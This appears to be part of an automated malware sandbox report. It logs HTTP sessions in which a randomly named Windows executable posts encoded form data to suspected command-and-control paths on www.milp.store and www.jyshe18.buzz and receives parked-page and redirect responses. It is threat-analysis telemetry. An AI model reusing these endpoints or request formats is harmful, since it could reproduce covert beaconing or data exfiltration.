Jan 8, 2025 12:49:39.622484922 CET	1236	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Jan 8, 2025 12:49:39.622498989 CET	878	IN	Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68 Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	57578	194.9.94.85	80	3964	C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 12:49:41.520450115 CET	1684	OUT	POST /2j93/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 1244 Connection: close Host: www.milp.store Origin: http://www.milp.store Referer: http://www.milp.store/2j93/ User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1) Data Raw: 6f 56 55 78 54 4c 4f 3d 59 78 32 2f 30 66 79 67 66 46 46 65 6d 78 4a 74 51 59 43 2f 75 55 78 5a 52 57 31 35 62 34 67 79 65 51 79 39 2b 6a 51 53 50 6d 6b 6a 62 63 31 68 34 4d 54 77 69 4d 54 74 38 77 32 6f 6d 6f 71 65 6c 2f 6d 59 4f 64 52 49 4a 36 62 6b 6f 38 41 50 57 38 6d 74 2b 47 61 5a 74 75 79 52 65 6a 69 6d 4a 62 58 6c 32 38 54 35 67 4d 31 69 51 63 6c 32 37 68 31 55 77 32 71 66 31 56 33 43 2b 38 74 5a 4b 4e 7a 35 4b 44 65 37 30 6a 78 43 45 75 61 52 4f 41 53 46 33 68 36 31 4d 34 43 51 65 55 2b 4a 68 4f 65 31 31 55 34 4d 66 6c 4a 52 33 5a 55 70 70 55 76 4d 49 61 46 69 67 4f 38 75 7a 70 6a 45 36 79 65 2b 45 6c 37 5a 4c 54 43 68 65 5a 6e 51 5a 53 4e 34 55 67 5a 56 4a 50 4b 53 6f 46 35 58 45 79 38 7a 4f 37 47 6c 6f 66 30 4b 41 46 43 71 67 55 69 53 66 79 61 34 52 48 41 77 56 58 57 59 39 46 67 32 2b 32 56 31 59 6c 6b 4c 4a 44 61 6b 37 2f 54 53 63 2f 69 67 56 50 49 51 76 4f 70 76 6b 6b 45 69 6e 75 32 6c 32 39 36 47 75 6f 65 67 74 5a 61 63 4e 6b 41 32 7a 76 38 44 65 54 58 4b 55 6a 41 43 73 42 36 6a 62 66 [TRUNCATED] Data Ascii: oVUxTLO=Yx2/0fygfFFemxJtQYC/uUxZRW15b4gyeQy9+jQSPmkjbc1h4MTwiMTt8w2omoqel/mYOdRIJ6bko8APW8mt+GaZtuyRejimJbXl28T5gM1iQcl27h1Uw2qf1V3C+8tZKNz5KDe70jxCEuaROASF3h61M4CQeU+JhOe11U4MflJR3ZUppUvMIaFigO8uzpjE6ye+El7ZLTCheZnQZSN4UgZVJPKSoF5XEy8zO7Glof0KAFCqgUiSfya4RHAwVXWY9Fg2+2V1YlkLJDak7/TSc/igVPIQvOpvkkEinu2l296GuoegtZacNkA2zv8DeTXKUjACsB6jbfHckU2GzZdNlSpTRrHm9Sec7IeHTr88SBS6hFxOlGSjFz2JN49B/jt9doRBwNwQhO8JMW5BR1/Nc2jzxbg0rfyiRsEnv90JpBmiZ6KmMnXifhMVgKEsUUEQXwy2YgG5ycLrvFiLBJKiyTY/puTqqzIoI/7vV6+A2YnrECNJi3gysOhHzI70HVShfVM/8vwZmjYgcMXX9i/k8XPE22CfdIdw2RQuafKQLEOqJZzoqDz70xpS5T5jeK9RkKeV67OpY8avfzH+kjl49ye/I8SR+rLNUUBXiUJ7l5glfa7tXO0di9BVt/x+YWhydmxeYscNxHkxL6AVnUROP0uTwWS2Nc1Lc4RPXQ7cZc76m+FaJIMRCh0TnaDYK7tpnZe1CpFhEBDjtFjJUfi/lP5xIjR2XK4qvQL8cdD1VmDXiOe6OIPT6i8RmTpkoj7gUAwOhWpfY1VzlTcZTv4NqLoCrvJipb7mfTI9KQcvljS9s7jYQIs8KDS7Tud+fX/09iwZLMM/hORMU7ZaDMuSVF9BtKG+e5fkfaqi7s4SckOOp5YhhziuU1CttiSmtNka6yJLKwJzhZLScg14XcxRcO2JphQd1VS9e26eh29eqwkY9wpk9KCQJUSAS01x8GEv+SCbxzsYKLG5K8ceWdC9dQGub59+N2GpkZVP31RfxFxL [TRUNCATED]
Jan 8, 2025 12:49:42.194371939 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 08 Jan 2025 11:49:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.30 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jan 8, 2025 12:49:42.194402933 CET	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Jan 8, 2025 12:49:42.194415092 CET	448	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Jan 8, 2025 12:49:42.194444895 CET	1236	IN	Data Raw: 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 0a 09 09 09 3c 68 32 3e 52 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 73 20 61 74 20 4c 6f 6f 70 69 61 3c 2f 68 32 3e 0a 09 09 09 3c 70 3e 50 72 6f 74 65 63 74 20 79 6f 75 72 20 Data Ascii: ss="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainnames/?utm_medium=sitelink
Jan 8, 2025 12:49:42.194456100 CET	224	IN	Data Raw: 64 20 6d 6f 72 65 20 61 74 20 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 6f 70 69 61 64 6e 73 20 c2 bb 3c 2f 61 3e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e Data Ascii: d more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need to g
Jan 8, 2025 12:49:42.194469929 CET	1236	IN	Data Raw: 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20 6f 6e 6c 69 6e 65 20 73 74 6f 72 65 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 3c 75 6c 3e 0a 09 09 09 Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
Jan 8, 2025 12:49:42.194497108 CET	206	IN	Data Raw: 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	57579	194.9.94.85	80	3964	C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 12:49:44.061306953 CET	395	OUT	GET /2j93/?oVUxTLO=Vzef3oWXaGELtgUQK6WziDhXN2l6Tpk3Ax3n2w42PW1Tdv5T/46T0viVyj66+7X9h8HGTeoaGJDhn+MaRcWt63bn0dOTASaMNZTI5trmrdZ8L/Alw25M+Xf5hGL6nvcNQQ==&9DQxz=BXUp_jixat HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.milp.store User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Jan 8, 2025 12:49:44.826718092 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 08 Jan 2025 11:49:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.30 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jan 8, 2025 12:49:44.826744080 CET	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Jan 8, 2025 12:49:44.826756001 CET	448	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Jan 8, 2025 12:49:44.826767921 CET	1236	IN	Data Raw: 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 0a 09 09 09 3c 68 32 3e 52 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 73 20 61 74 20 4c 6f 6f 70 69 61 3c 2f 68 32 3e 0a 09 09 09 3c 70 3e 50 72 6f 74 65 63 74 20 79 6f 75 72 20 Data Ascii: ss="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainnames/?utm_medium=sitelink
Jan 8, 2025 12:49:44.826781034 CET	1236	IN	Data Raw: 64 20 6d 6f 72 65 20 61 74 20 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 6f 70 69 61 64 6e 73 20 c2 bb 3c 2f 61 3e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e Data Ascii: d more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need to get started with you
Jan 8, 2025 12:49:44.826797009 CET	430	IN	Data Raw: 77 77 2e 6c 6f 6f 70 69 61 2e 73 65 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 Data Ascii: ww.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https://www.loopia.com/support?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	57580	172.67.131.144	80	3964	C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 12:49:57.956706047 CET	653	OUT	POST /1lpi/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 208 Connection: close Host: www.jyshe18.buzz Origin: http://www.jyshe18.buzz Referer: http://www.jyshe18.buzz/1lpi/ User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1) Data Raw: 6f 56 55 78 54 4c 4f 3d 61 4d 53 46 4f 74 34 36 67 50 45 6d 4c 33 33 46 63 77 62 49 79 33 56 74 30 47 79 34 37 32 79 37 54 76 44 46 76 51 4a 61 6e 48 5a 6f 41 77 45 43 43 72 46 31 57 69 6c 75 6f 69 56 37 75 2b 6b 6d 6f 6a 58 7a 35 75 58 42 73 72 54 73 49 6c 55 77 44 6d 69 2b 32 6e 78 33 69 51 37 61 4f 36 6e 58 4f 36 67 4a 47 44 6e 37 78 74 74 55 62 4e 47 50 30 30 55 44 4f 42 30 47 6a 52 73 38 4a 45 62 32 51 44 77 54 67 50 64 2b 32 71 32 50 69 62 71 2f 38 58 2f 57 73 75 46 45 50 66 57 33 51 2b 63 4d 49 6e 6e 75 70 42 57 36 32 42 6e 63 51 55 75 75 69 2b 53 2b 38 4f 68 30 42 72 61 69 4c 6d 77 68 73 38 4c 5a 69 64 34 3d Data Ascii: oVUxTLO=aMSFOt46gPEmL33FcwbIy3Vt0Gy472y7TvDFvQJanHZoAwECCrF1WiluoiV7u+kmojXz5uXBsrTsIlUwDmi+2nx3iQ7aO6nXO6gJGDn7xttUbNGP00UDOB0GjRs8JEb2QDwTgPd+2q2Pibq/8X/WsuFEPfW3Q+cMInnupBW62BncQUuui+S+8Oh0BraiLmwhs8LZid4=
Jan 8, 2025 12:49:58.580373049 CET	1236	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 08 Jan 2025 11:49:58 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Location: http://www.jyshe18.buzz/ X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Referrer-Policy: no-referrer-when-downgrade Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self'; Permissions-Policy: interest-cohort=() cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aTBzWmyUnLZ2Cvu6jDLNq6dORkiy5qtHqqVw6mdRf08bnmM4cqMpj010cA0Q47fXV6irKZNHLUgtP3dC9NWLTskZDm%2FsnRn4l2nv%2BR0zeemXD0A%2FLPvnQPPNMSKCgA9WqzWK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8febf79fcc9ac443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1461&min_rtt=1461&rtt_var=730&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=653&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body>
Jan 8, 2025 12:49:58.580387115 CET	18	IN	Data Raw: 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: </html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	57581	172.67.131.144	80	3964	C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 12:50:00.521461964 CET	673	OUT	POST /1lpi/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 228 Connection: close Host: www.jyshe18.buzz Origin: http://www.jyshe18.buzz Referer: http://www.jyshe18.buzz/1lpi/ User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1) Data Raw: 6f 56 55 78 54 4c 4f 3d 61 4d 53 46 4f 74 34 36 67 50 45 6d 49 54 7a 46 62 58 50 49 30 58 56 75 78 47 79 34 69 6d 79 33 54 76 50 46 76 52 39 4b 6d 79 4a 6f 42 55 55 43 44 70 39 31 66 79 6c 75 39 53 56 2b 68 65 6c 71 6f 6a 62 52 35 76 72 42 73 72 33 73 49 6c 45 77 44 52 32 35 33 33 78 31 70 77 37 45 51 4b 6e 58 4f 36 67 4a 47 44 6a 42 78 74 46 55 61 2b 65 50 31 56 55 43 51 78 30 46 30 68 73 38 65 55 62 79 51 44 77 68 67 4e 6f 6c 32 6f 2b 50 69 5a 79 2f 38 6a 72 56 37 2b 46 47 4d 76 58 4f 5a 4e 4e 53 4d 6e 37 75 70 6a 58 4a 31 43 76 57 52 69 66 45 34 63 61 57 76 75 4e 4d 52 34 53 56 61 57 52 49 32 66 62 70 38 4b 74 5a 41 2f 50 32 66 66 31 66 51 41 76 74 41 59 70 64 30 56 75 65 Data Ascii: oVUxTLO=aMSFOt46gPEmITzFbXPI0XVuxGy4imy3TvPFvR9KmyJoBUUCDp91fylu9SV+helqojbR5vrBsr3sIlEwDR2533x1pw7EQKnXO6gJGDjBxtFUa+eP1VUCQx0F0hs8eUbyQDwhgNol2o+PiZy/8jrV7+FGMvXOZNNSMn7upjXJ1CvWRifE4caWvuNMR4SVaWRI2fbp8KtZA/P2ff1fQAvtAYpd0Vue
Jan 8, 2025 12:50:01.123605013 CET	1236	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 08 Jan 2025 11:50:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Location: http://www.jyshe18.buzz/ X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Referrer-Policy: no-referrer-when-downgrade Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self'; Permissions-Policy: interest-cohort=() cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=akOn8RWGo9gjLnmn%2FtMMVrgyaOxNk7VVrepsxnQNM4%2FQascFaExfSkFw1ahNrDAot90c9lbBPs911%2B9%2Fxt3UA2aGEnySM7x9A2tqFbPp2TN3HWyfiGviUuiJ5sQtep78giXD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8febf7afab7e41f8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1571&rtt_var=785&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=673&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></bod
Jan 8, 2025 12:50:01.123613119 CET	20	IN	Data Raw: 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: y></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	57582	172.67.131.144	80	3964	C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe

Timestamp	Bytes transferred	Direction	Data
